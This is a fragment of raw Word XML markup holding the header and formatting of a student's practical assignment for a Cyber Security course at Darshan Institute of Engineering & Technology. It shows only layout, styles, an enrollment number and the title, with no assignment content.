      <w:tblBorders>
        <w:top w:val="single" w:color="808080" w:sz="18" w:space="0"/>
        <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        <w:insideV w:val="single" w:color="808080" w:sz="18" w:space="0"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="598"/>
      <w:gridCol w:w="9302"/>
    </w:tblGrid>
    <w:tr>
      <w:tblPrEx>
        <w:tblBorders>
          <w:top w:val="single" w:color="808080" w:sz="18" w:space="0"/>
          <w:left w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:insideV w:val="single" w:color="808080" w:sz="18" w:space="0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPrEx>
      <w:trPr>
        <w:trHeight w:val="402" w:hRule="atLeast"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="598" w:type="dxa"/>
        </w:tcPr>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rFonts w:eastAsia="Calibri"/>
              <w:b/>
              <w:color w:val="000000"/>
              <w:sz w:val="32"/>
              <w:szCs w:val="32"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:instrText xml:space="preserve">PAGE</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="9302" w:type="dxa"/>
        </w:tcPr>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rFonts w:eastAsia="Calibri"/>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>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eastAsia="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>228600</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-279400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2840355" cy="352425"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="14" name="Rectangle 16"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2840355" cy="352425"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:line="275" w:lineRule="auto"/>
                            <w:rPr>
                              <w:rFonts w:hint="default"/>
                              <w:lang w:val="en-US"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                              <w:b/>
                              <w:color w:val="000000"/>
                            </w:rPr>
                            <w:t xml:space="preserve">   Enrollment No: - </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                              <w:b/>
                              <w:color w:val="FF0000"/>
                            </w:rPr>
                            <w:t>2101010110</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                              <w:b/>
                              <w:color w:val="FF0000"/>
                              <w:lang w:val="en-US"/>
                            </w:rPr>
                            <w:t>8</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="Rectangle 16" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:18pt;margin-top:-22pt;height:27.75pt;width:223.65pt;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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8slBVtUAAAAJAQAADwAAAAAAAAAB&#10;ACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQHg/OqDaAQAAxAMAAA4AAAAA&#10;AAAAAQAgAAAAJAEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHAFAAAAAA==&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
              <v:textbox inset="7.1988188976378pt,3.59842519685039pt,7.1988188976378pt,3.59842519685039pt">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="275" w:lineRule="auto"/>
                      <w:rPr>
                        <w:rFonts w:hint="default"/>
                        <w:lang w:val="en-US"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                        <w:b/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                      <w:t xml:space="preserve">   Enrollment No: - </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                        <w:b/>
                        <w:color w:val="FF0000"/>
                      </w:rPr>
                      <w:t>2101010110</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                        <w:b/>
                        <w:color w:val="FF0000"/>
                        <w:lang w:val="en-US"/>
                      </w:rPr>
                      <w:t>8</w:t>
                    </w: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4076700</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-279400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2251710" cy="304800"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="13" name="Rectangle 15"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2251710" cy="304800"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:line="275" w:lineRule="auto"/>
                            <w:jc w:val="center"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                              <w:b/>
                              <w:color w:val="000000"/>
                            </w:rPr>
                            <w:t xml:space="preserve">| </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                              <w:b/>
                              <w:color w:val="FF0000"/>
                            </w:rPr>
                            <w:t>CSE</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:rect id="Rectangle 15" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:321pt;margin-top:-22pt;height:24pt;width:177.3pt;z-index:251660288;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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PB68tQAAAAJAQAADwAAAAAAAAAB&#10;ACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQPnPaDzbAQAAxAMAAA4AAAAA&#10;AAAAAQAgAAAAIwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHAFAAAAAA==&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
              <v:textbox inset="7.1988188976378pt,3.59842519685039pt,7.1988188976378pt,3.59842519685039pt">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="275" w:lineRule="auto"/>
                      <w:jc w:val="center"/>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                        <w:b/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                      <w:t xml:space="preserve">| </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                        <w:b/>
                        <w:color w:val="FF0000"/>
                      </w:rPr>
                      <w:t>CSE</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateConten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t>Darshan Institute of Engineering &amp; Technology</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="2"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Semester 6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:vertAlign w:val="superscript"/>
      </w:rPr>
      <w:t>th</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve"> | Practical Assignment | Cyber Security (2101CS632)</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="2"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rP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50800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6278245" cy="50800"/>
              <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
              <wp:wrapNone/>
              <wp:docPr id="18" name="Straight Arrow Connector 17"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm rot="10800000" flipH="1">
                        <a:off x="0" y="0"/>
                        <a:ext cx="6278245" cy="5080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id="Straight Arrow Connector 17" o:spid="_x0000_s1026" o:spt="32" type="#_x0000_t32" style="position:absolute;left:0pt;flip:x;margin-left:0pt;margin-top:4pt;height:4pt;width:494.35pt;rotation:11796480f;z-index:251661312;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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48B+NIAAAAFAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAhQAFAAAAAgAh07iQMrbR1YBAgAAIAQAAA4AAAAAAAAAAQAgAAAAIQEAAGRycy9lMm9E&#10;b2MueG1sUEsFBgAAAAAGAAYAWQEAAJQFAAAAAA==&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke weight="1.5pt" color="#000000 [3200]" joinstyle="round" startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>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4F279E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="034F279E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>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780"/>
    <w:rsid w:val="00000773"/>
    <w:rsid w:val="000035BF"/>
    <w:rsid w:val="00003E92"/>
    <w:rsid w:val="00003FFF"/>
    <w:rsid w:val="000070B6"/>
    <w:rsid w:val="000120CC"/>
    <w:rsid w:val="00012675"/>
    <w:rsid w:val="00015458"/>
    <w:rsid w:val="00015F04"/>
    <w:rsid w:val="000328DE"/>
    <w:rsid w:val="0003429F"/>
    <w:rsid w:val="00037294"/>
    <w:rsid w:val="000418DF"/>
    <w:rsid w:val="0005094C"/>
    <w:rsid w:val="00056244"/>
    <w:rsid w:val="00057A4F"/>
    <w:rsid w:val="00065B6F"/>
    <w:rsid w:val="0008243F"/>
    <w:rsid w:val="000C0328"/>
    <w:rsid w:val="000C19F0"/>
    <w:rsid w:val="000E0A9F"/>
    <w:rsid w:val="000E2613"/>
    <w:rsid w:val="000F6498"/>
    <w:rsid w:val="00100753"/>
    <w:rsid w:val="00105FE9"/>
    <w:rsid w:val="00106F61"/>
    <w:rsid w:val="00116D5A"/>
    <w:rsid w:val="00123BB8"/>
    <w:rsid w:val="00126E42"/>
    <w:rsid w:val="00145FB9"/>
    <w:rsid w:val="0015520F"/>
    <w:rsid w:val="00160CC2"/>
    <w:rsid w:val="00161B15"/>
    <w:rsid w:val="00164D3C"/>
    <w:rsid w:val="00165308"/>
    <w:rsid w:val="001746D9"/>
    <w:rsid w:val="001758D0"/>
    <w:rsid w:val="00177714"/>
    <w:rsid w:val="00185ECA"/>
    <w:rsid w:val="00187C7D"/>
    <w:rsid w:val="001952D9"/>
    <w:rsid w:val="001A3580"/>
    <w:rsid w:val="001A7FE9"/>
    <w:rsid w:val="001B155D"/>
    <w:rsid w:val="001D0587"/>
    <w:rsid w:val="001E250B"/>
    <w:rsid w:val="001E28D2"/>
    <w:rsid w:val="0020413D"/>
    <w:rsid w:val="00215A72"/>
    <w:rsid w:val="00220F7C"/>
    <w:rsid w:val="00221222"/>
    <w:rsid w:val="00225D9D"/>
    <w:rsid w:val="00227D86"/>
    <w:rsid w:val="00234C04"/>
    <w:rsid w:val="00243843"/>
    <w:rsid w:val="002531EA"/>
    <w:rsid w:val="002601A9"/>
    <w:rsid w:val="00260425"/>
    <w:rsid w:val="002762B2"/>
    <w:rsid w:val="00281796"/>
    <w:rsid w:val="0028656A"/>
    <w:rsid w:val="0028723C"/>
    <w:rsid w:val="002918E7"/>
    <w:rsid w:val="00295E9D"/>
    <w:rsid w:val="002A26B1"/>
    <w:rsid w:val="002A7824"/>
    <w:rsid w:val="002B05AD"/>
    <w:rsid w:val="002C3353"/>
    <w:rsid w:val="002C3862"/>
    <w:rsid w:val="002D2F68"/>
    <w:rsid w:val="002E312B"/>
    <w:rsid w:val="002E704F"/>
    <w:rsid w:val="002F0C7E"/>
    <w:rsid w:val="002F2437"/>
    <w:rsid w:val="002F4D16"/>
    <w:rsid w:val="00314B98"/>
    <w:rsid w:val="0033065A"/>
    <w:rsid w:val="00337F75"/>
    <w:rsid w:val="00341615"/>
    <w:rsid w:val="003418B1"/>
    <w:rsid w:val="003422B5"/>
    <w:rsid w:val="00357074"/>
    <w:rsid w:val="003605C3"/>
    <w:rsid w:val="003771A2"/>
    <w:rsid w:val="00381159"/>
    <w:rsid w:val="00382F2E"/>
    <w:rsid w:val="00393736"/>
    <w:rsid w:val="00393869"/>
    <w:rsid w:val="003B1C82"/>
    <w:rsid w:val="003B254D"/>
    <w:rsid w:val="003C5DAC"/>
    <w:rsid w:val="003D17D6"/>
    <w:rsid w:val="003D25F9"/>
    <w:rsid w:val="003D3A27"/>
    <w:rsid w:val="003D5011"/>
    <w:rsid w:val="00403E97"/>
    <w:rsid w:val="004208EF"/>
    <w:rsid w:val="00421465"/>
    <w:rsid w:val="00421736"/>
    <w:rsid w:val="00430350"/>
    <w:rsid w:val="00432864"/>
    <w:rsid w:val="00440931"/>
    <w:rsid w:val="00443724"/>
    <w:rsid w:val="00446F61"/>
    <w:rsid w:val="004519E4"/>
    <w:rsid w:val="00464C03"/>
    <w:rsid w:val="00473D49"/>
    <w:rsid w:val="00487603"/>
    <w:rsid w:val="004947A5"/>
    <w:rsid w:val="004A0A82"/>
    <w:rsid w:val="004A43C0"/>
    <w:rsid w:val="004E01CD"/>
    <w:rsid w:val="004E53B9"/>
    <w:rsid w:val="004F437C"/>
    <w:rsid w:val="00503623"/>
    <w:rsid w:val="005107FC"/>
    <w:rsid w:val="00511BA9"/>
    <w:rsid w:val="00522BB1"/>
    <w:rsid w:val="00523907"/>
    <w:rsid w:val="00530C50"/>
    <w:rsid w:val="00534197"/>
    <w:rsid w:val="00540897"/>
    <w:rsid w:val="00543AA2"/>
    <w:rsid w:val="00554389"/>
    <w:rsid w:val="0056553B"/>
    <w:rsid w:val="00576A3A"/>
    <w:rsid w:val="005851D2"/>
    <w:rsid w:val="005922D8"/>
    <w:rsid w:val="005A2695"/>
    <w:rsid w:val="005A3026"/>
    <w:rsid w:val="005A6102"/>
    <w:rsid w:val="005C2090"/>
    <w:rsid w:val="005E6F71"/>
    <w:rsid w:val="005F75BD"/>
    <w:rsid w:val="00601D3F"/>
    <w:rsid w:val="00615A08"/>
    <w:rsid w:val="006356FC"/>
    <w:rsid w:val="0063727B"/>
    <w:rsid w:val="00637EBB"/>
    <w:rsid w:val="0064173D"/>
    <w:rsid w:val="00652AF8"/>
    <w:rsid w:val="006748CB"/>
    <w:rsid w:val="00682D26"/>
    <w:rsid w:val="00683D9A"/>
    <w:rsid w:val="006926F8"/>
    <w:rsid w:val="00693366"/>
    <w:rsid w:val="00696020"/>
    <w:rsid w:val="00697EED"/>
    <w:rsid w:val="006B026F"/>
    <w:rsid w:val="006C1A1F"/>
    <w:rsid w:val="006D479D"/>
    <w:rsid w:val="006E08FB"/>
    <w:rsid w:val="006E242E"/>
    <w:rsid w:val="006F2A68"/>
    <w:rsid w:val="006F3524"/>
    <w:rsid w:val="00702974"/>
    <w:rsid w:val="007031DF"/>
    <w:rsid w:val="00712870"/>
    <w:rsid w:val="007134B8"/>
    <w:rsid w:val="0071409C"/>
    <w:rsid w:val="0073418B"/>
    <w:rsid w:val="00746D5C"/>
    <w:rsid w:val="007507A0"/>
    <w:rsid w:val="007546DE"/>
    <w:rsid w:val="0075672F"/>
    <w:rsid w:val="00756FAE"/>
    <w:rsid w:val="007608AA"/>
    <w:rsid w:val="00783AA3"/>
    <w:rsid w:val="00786DFD"/>
    <w:rsid w:val="007A2E08"/>
    <w:rsid w:val="007A6C68"/>
    <w:rsid w:val="007A7878"/>
    <w:rsid w:val="007C6BC1"/>
    <w:rsid w:val="007E1701"/>
    <w:rsid w:val="007E2909"/>
    <w:rsid w:val="007F0837"/>
    <w:rsid w:val="007F16DD"/>
    <w:rsid w:val="0080288B"/>
    <w:rsid w:val="008110C5"/>
    <w:rsid w:val="008131CC"/>
    <w:rsid w:val="00813A90"/>
    <w:rsid w:val="00817C80"/>
    <w:rsid w:val="00842877"/>
    <w:rsid w:val="00852478"/>
    <w:rsid w:val="008565B3"/>
    <w:rsid w:val="00860ADF"/>
    <w:rsid w:val="00880044"/>
    <w:rsid w:val="00883BFC"/>
    <w:rsid w:val="00885C7B"/>
    <w:rsid w:val="0089731A"/>
    <w:rsid w:val="008A4EAF"/>
    <w:rsid w:val="008B1A4B"/>
    <w:rsid w:val="008B378D"/>
    <w:rsid w:val="008B3D47"/>
    <w:rsid w:val="008B7D7A"/>
    <w:rsid w:val="008C489B"/>
    <w:rsid w:val="008E586E"/>
    <w:rsid w:val="008E6CCB"/>
    <w:rsid w:val="008E798A"/>
    <w:rsid w:val="008F5B41"/>
    <w:rsid w:val="009253DD"/>
    <w:rsid w:val="00964C07"/>
    <w:rsid w:val="009656D8"/>
    <w:rsid w:val="00966195"/>
    <w:rsid w:val="00981206"/>
    <w:rsid w:val="009842B5"/>
    <w:rsid w:val="00992577"/>
    <w:rsid w:val="00994C12"/>
    <w:rsid w:val="00995B26"/>
    <w:rsid w:val="009A47DF"/>
    <w:rsid w:val="009A7404"/>
    <w:rsid w:val="009C7271"/>
    <w:rsid w:val="009D3B2A"/>
    <w:rsid w:val="009D50DF"/>
    <w:rsid w:val="009D7B33"/>
    <w:rsid w:val="009E7457"/>
    <w:rsid w:val="00A01D24"/>
    <w:rsid w:val="00A03FD5"/>
    <w:rsid w:val="00A07ED5"/>
    <w:rsid w:val="00A205E9"/>
    <w:rsid w:val="00A2092E"/>
    <w:rsid w:val="00A24447"/>
    <w:rsid w:val="00A27609"/>
    <w:rsid w:val="00A346EA"/>
    <w:rsid w:val="00A35ED1"/>
    <w:rsid w:val="00A52407"/>
    <w:rsid w:val="00A53D99"/>
    <w:rsid w:val="00A56C72"/>
    <w:rsid w:val="00A617CF"/>
    <w:rsid w:val="00A6776E"/>
    <w:rsid w:val="00A85B21"/>
    <w:rsid w:val="00A9156B"/>
    <w:rsid w:val="00AA3E10"/>
    <w:rsid w:val="00AA6190"/>
    <w:rsid w:val="00AB4AEF"/>
    <w:rsid w:val="00AB7BDF"/>
    <w:rsid w:val="00AB7C6D"/>
    <w:rsid w:val="00AD5B63"/>
    <w:rsid w:val="00AE0D32"/>
    <w:rsid w:val="00AE26DA"/>
    <w:rsid w:val="00AF136E"/>
    <w:rsid w:val="00B00394"/>
    <w:rsid w:val="00B01E45"/>
    <w:rsid w:val="00B1692A"/>
    <w:rsid w:val="00B23C64"/>
    <w:rsid w:val="00B25148"/>
    <w:rsid w:val="00B310D7"/>
    <w:rsid w:val="00B3146E"/>
    <w:rsid w:val="00B3409C"/>
    <w:rsid w:val="00B3526A"/>
    <w:rsid w:val="00B511F7"/>
    <w:rsid w:val="00B5728F"/>
    <w:rsid w:val="00B57BC1"/>
    <w:rsid w:val="00B64C71"/>
    <w:rsid w:val="00B716AC"/>
    <w:rsid w:val="00B752EE"/>
    <w:rsid w:val="00B80956"/>
    <w:rsid w:val="00BA48C1"/>
    <w:rsid w:val="00BB6CDA"/>
    <w:rsid w:val="00BC6F22"/>
    <w:rsid w:val="00BE2CCE"/>
    <w:rsid w:val="00BF71E1"/>
    <w:rsid w:val="00C000B6"/>
    <w:rsid w:val="00C0074C"/>
    <w:rsid w:val="00C02E37"/>
    <w:rsid w:val="00C06C3C"/>
    <w:rsid w:val="00C1448E"/>
    <w:rsid w:val="00C17834"/>
    <w:rsid w:val="00C17AD4"/>
    <w:rsid w:val="00C22325"/>
    <w:rsid w:val="00C249A6"/>
    <w:rsid w:val="00C3323F"/>
    <w:rsid w:val="00C34621"/>
    <w:rsid w:val="00C40E8B"/>
    <w:rsid w:val="00C62C57"/>
    <w:rsid w:val="00C67FBA"/>
    <w:rsid w:val="00C72FC9"/>
    <w:rsid w:val="00C80386"/>
    <w:rsid w:val="00C8182E"/>
    <w:rsid w:val="00C84084"/>
    <w:rsid w:val="00CA017E"/>
    <w:rsid w:val="00CA4973"/>
    <w:rsid w:val="00CB321E"/>
    <w:rsid w:val="00CB7E1C"/>
    <w:rsid w:val="00CF1E4C"/>
    <w:rsid w:val="00CF41EE"/>
    <w:rsid w:val="00D037E4"/>
    <w:rsid w:val="00D0536F"/>
    <w:rsid w:val="00D1142C"/>
    <w:rsid w:val="00D12DD1"/>
    <w:rsid w:val="00D20F01"/>
    <w:rsid w:val="00D21DC1"/>
    <w:rsid w:val="00D23749"/>
    <w:rsid w:val="00D239D7"/>
    <w:rsid w:val="00D45105"/>
    <w:rsid w:val="00D4578A"/>
    <w:rsid w:val="00D5581F"/>
    <w:rsid w:val="00D61A67"/>
    <w:rsid w:val="00D70B50"/>
    <w:rsid w:val="00D73DCC"/>
    <w:rsid w:val="00D82314"/>
    <w:rsid w:val="00DA0458"/>
    <w:rsid w:val="00DB1673"/>
    <w:rsid w:val="00DB2271"/>
    <w:rsid w:val="00DB236F"/>
    <w:rsid w:val="00DD3D14"/>
    <w:rsid w:val="00DD7DD4"/>
    <w:rsid w:val="00DE38D9"/>
    <w:rsid w:val="00E02AEF"/>
    <w:rsid w:val="00E036DA"/>
    <w:rsid w:val="00E04780"/>
    <w:rsid w:val="00E06977"/>
    <w:rsid w:val="00E11FD9"/>
    <w:rsid w:val="00E27A06"/>
    <w:rsid w:val="00E312AB"/>
    <w:rsid w:val="00E32C54"/>
    <w:rsid w:val="00E35BDC"/>
    <w:rsid w:val="00E35BF3"/>
    <w:rsid w:val="00E451D9"/>
    <w:rsid w:val="00E518DE"/>
    <w:rsid w:val="00E53866"/>
    <w:rsid w:val="00E57589"/>
    <w:rsid w:val="00E620BF"/>
    <w:rsid w:val="00E948F9"/>
    <w:rsid w:val="00EA5D6D"/>
    <w:rsid w:val="00EA689F"/>
    <w:rsid w:val="00EA6CE8"/>
    <w:rsid w:val="00EA7017"/>
    <w:rsid w:val="00EB126F"/>
    <w:rsid w:val="00ED554E"/>
    <w:rsid w:val="00EE3115"/>
    <w:rsid w:val="00EE4C9E"/>
    <w:rsid w:val="00F0216F"/>
    <w:rsid w:val="00F179A6"/>
    <w:rsid w:val="00F3618C"/>
    <w:rsid w:val="00F36996"/>
    <w:rsid w:val="00F476F5"/>
    <w:rsid w:val="00F522A8"/>
    <w:rsid w:val="00F535AB"/>
    <w:rsid w:val="00F666C3"/>
    <w:rsid w:val="00F66B9C"/>
    <w:rsid w:val="00F67255"/>
    <w:rsid w:val="00F81A13"/>
    <w:rsid w:val="00F846BA"/>
    <w:rsid w:val="00F85E2F"/>
    <w:rsid w:val="00F863BF"/>
    <w:rsid w:val="00F912FC"/>
    <w:rsid w:val="00FA2B2B"/>
    <w:rsid w:val="00FA30B5"/>
    <w:rsid w:val="00FB33D0"/>
    <w:rsid w:val="00FB4910"/>
    <w:rsid w:val="00FB54B7"/>
    <w:rsid w:val="00FC2BA1"/>
    <w:rsid w:val="00FC4E09"/>
    <w:rsid w:val="00FD4310"/>
    <w:rsid w:val="00FD6990"/>
    <w:rsid w:val="00FE047C"/>
    <w:rsid w:val="00FF5CA1"/>
    <w:rsid w:val="2CA152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3"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:textFill>
